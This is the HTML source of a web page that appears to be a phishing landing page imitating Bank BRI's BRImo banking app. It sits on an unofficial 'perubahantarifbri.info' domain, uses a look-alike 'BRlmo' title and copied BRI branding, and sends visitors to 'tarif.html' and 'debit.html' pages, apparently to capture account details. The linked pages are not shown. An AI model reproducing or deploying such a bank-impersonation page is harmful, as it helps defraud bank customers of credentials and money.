<!doctype html>
<html lang="en">

<head>
     
    <meta charset="utf-8">
    <meta name="fragment" content="!">
    <meta name="description"
        content="BRImo merupakan Aplikasi Keuangan Bank Digital BRI Terbaru berbasis data internet yang memberikan kemudahan bagi nasabah maupun non nasabah BRI untuk dapat bertransaksi dengan User Interface dan User Experience terbaru, fitur login face recognition, login fingerprint, top up gopay, pembayaran QR dan fitur menarik lainnya, dengan pilihan Sumber Dana/sumber dana setiap transaksi dapat ...">
    <link rel="canonical" href="https://perubahantarifbri.info/-brimo" />
    <meta name="twitter:card" content="summary_large_image" />
    <meta property="og:title" content="BRlmo - Bank BRI" />
    <meta name="twitter:title" content="BRlmo - Bank BRI" />
    <meta property="og:site_name" content="BRImo" />
    <meta name="twitter:site_name" content="BRImo" />
    <meta property="og:description"
        content="BRImo merupakan Aplikasi Keuangan Bank Digital BRI Terbaru berbasis data internet yang memberikan kemudahan bagi nasabah maupun non nasabah BRI untuk dapat bertransaksi dengan User Interface dan User Experience terbaru, fitur login face recognition, login fingerprint, top up gopay, pembayaran QR dan fitur menarik lainnya, dengan pilihan Sumber Dana/sumber dana setiap transaksi dapat ..." />
    <meta name="twitter:description"
        content="BRImo merupakan Aplikasi Keuangan Bank Digital BRI Terbaru berbasis data internet yang memberikan kemudahan bagi nasabah maupun non nasabah BRI untuk dapat bertransaksi dengan User Interface dan User Experience terbaru, fitur login face recognition, login fingerprint, top up gopay, pembayaran QR dan fitur menarik lainnya, dengan pilihan Sumber Dana/sumber dana setiap transaksi dapat ..." />
    <link rel="image_src"
        href="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&h=&auto=compress&dpr=1&fit=max" />
    <meta property="og:image"
        content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&h=&auto=compress&dpr=1&fit=max" />
    <meta name="twitter:image:src"
        content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&h=&auto=compress&dpr=1&fit=max" />
    <meta property="og:url" content="https://perubahantarifbri.info/-brimo" />
    <meta property="og:type" content="website" />
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent" />
    <meta charset="utf-8">
        <title>Responsive Design</title>
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <link rel="stylesheet" href="normalize.min.css">
        <link rel="stylesheet" href="tes.css"> <title>BRImo- Bank BRI</title>
    <title>BRImo- Bank BRI</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous">
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');

        @font-face {
            font-family: ''Avenir';'
            src: url('assets/fonts/AvenirNextLTPro-Bold.otf');
        }

html{
    margin-left: 10px;
    margin-right: 10px;
}

        body {
            font-family: 'Avenir';
        }

        .text-header {
            font-family: 'Open Sans', sans-serif;
            color: #0086e0;
            font-weight: 800;
            font-size: 20px;
            display: block;
        }

        .text-subheader {
            font-family: 'Open Sans', sans-serif;
            margin-top: 5px;
            color: #000;
            font-weight: 800;
        }

        .btn-punya {
            font-family: 'Open Sans', sans-serif;
            display: block;
            margin: 80px auto 0 auto;
            padding: 0px;
           margin-bottom: -7px;
            cursor: pointer;
            background: none rgb(0, 134, 224);
            border: none;
            text-align: center;
            height: 47px;
            width: 459px;
            max-width: 95%;
            font-family: Arial;
            font-size: 14px;
            font-weight: bold;
            color: rgb(255, 255, 255);
            letter-spacing: 2px;
            line-height: 1;
            border-radius: 5px;
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
            transition: background 200ms ease 0s;
        }
welalxcome {
        position: fixed;
    left: 0;
    top: 0;
    width: 100vw;
    height: 100vh;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-items: center;
    align-content: center;
    justify-content: center;
}
welalxcome img {
        width:21vw;
    height: auto;
}
chsalxcome {
        position: relative;
    width: 100%;
    height: 100vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}

        .btn-belum {
            font-family: 'Open Sans', sans-serif;
            display: block;
            margin: 20px auto;
            padding: 0px;
            margin-top: -px;
            cursor: pointer;
            background: none transparent;
            border: none;
            text-align: center;
            height: 47px;
            width: 459px;
            max-width: 100%;
            font-family: Arial;
            font-size: 13px;
            font-weight: bold;
            color: #025198;
            letter-spacing: 1px;
            line-height: 1;
            border-radius: 5px;
            transition: background 200ms ease 0s;
        }

        #loading {
            width: 100%;
            height: 100%;
            display: none;
            margin: auto;
            position: fixed;
            top: 0;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.6);
            z-index: 99999;
        }

        #loading img {
            width: 300px;
            position: absolute;
            top: 5%;
            left: 0;
            right: 0;
            display: block;
            margin: auto;
        }

        #aseli {
            width: 100%;
            height: 100%;
            display: none;
            margin: auto;
            position: fixed;
            top: 0;
            left: 0;
            right: 0;
            bottom: 0;
            z-index: 9999;
            overflow-y: scroll;
        }
        .imagesi{
            width: 100%;
            height: auto;
            position: cover;
            bottom: 30px;
        }
        
    </style>
</head>

<body>
    <main>
<chsalxcome2 style="display: none;">
<div style="height:30px;width: 70px;margin-top: -30px;margin-bottom: 0px;float:center;margin-left:42%" class="talxcome">
</div>
 <img alt="" class="imagesi" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNam3zkbnR5-ytNRCnlHb7LWHjR_TkGX45QFwWez6bNoAX1vssoUHb7ia5T9Kg_y8jmGwHWwbyneLudXl2Bq9YF1_eFsVyMfA_b-x1InPOXqAwg4bYtnkhJ1mm48bIJt4bZFS-xEMVOotmxGWbB6XtN1FAPTJVQqLI1E11VSG21hxo0ERcBGy8mwUD/s1088/IMG_20221212_210222.png"> 
    <div class="container" id="hideBody">
        <div class="row">
            
        </div>
        <div class="fixed-bottom px-3">
            <div class="row" style="margin-bottom: -20px;">
                <div class="col-12 d-block mx-auto">
                </div>
            </div>
            <div class="row">
                <div class="col-12">
                    <button type="button" class="btn-punya">Punya Akun</button>
                </div>
                <div class="col-12">
                    <button type="button" class="btn-belum" onclick="location.href='./debit.html';">Belum punya Akun</button> 
                </div>
            </div>
        </div>
    </div>
    <div id="loading">
        <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWd6BTdqKohGDhFlG8gnaY-UhLJlR9KV6omzsNkwEMuO56pAezyOK8BYAU0uCuuc1csDVIQGWVz_7ghSt7VllnA9dBTdU5Nruyc5dExInXQzPKvn_lP6IQh2jY_nUJpuyyBYDu8PjH-kfzXSUuY4eIl0HcrpMjUNvoi9JmMmfTx5AfiUbfm_mvEra_/s1067/ezgif.com-gif-maker%20(10).gif"
            alt="">
    </div>
    <div id="aseli"></div>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js"
        integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous">
    </script>
    <script>
        $(document).ready(function () {
            $(".btn-punya").on('click', function () {
                $("#loading").show();
                
                setTimeout(function () {
                    location.href ="tarif.html";
                }, 1000);

            });
        });
    </script>
    <script>
        $( document ).ready(function() {
            setTimeout(() => {
                $('welalxcome').hide();
                $('chsalxcome2').fadeIn();
            },1000)
        });
</script>
</body>
</html>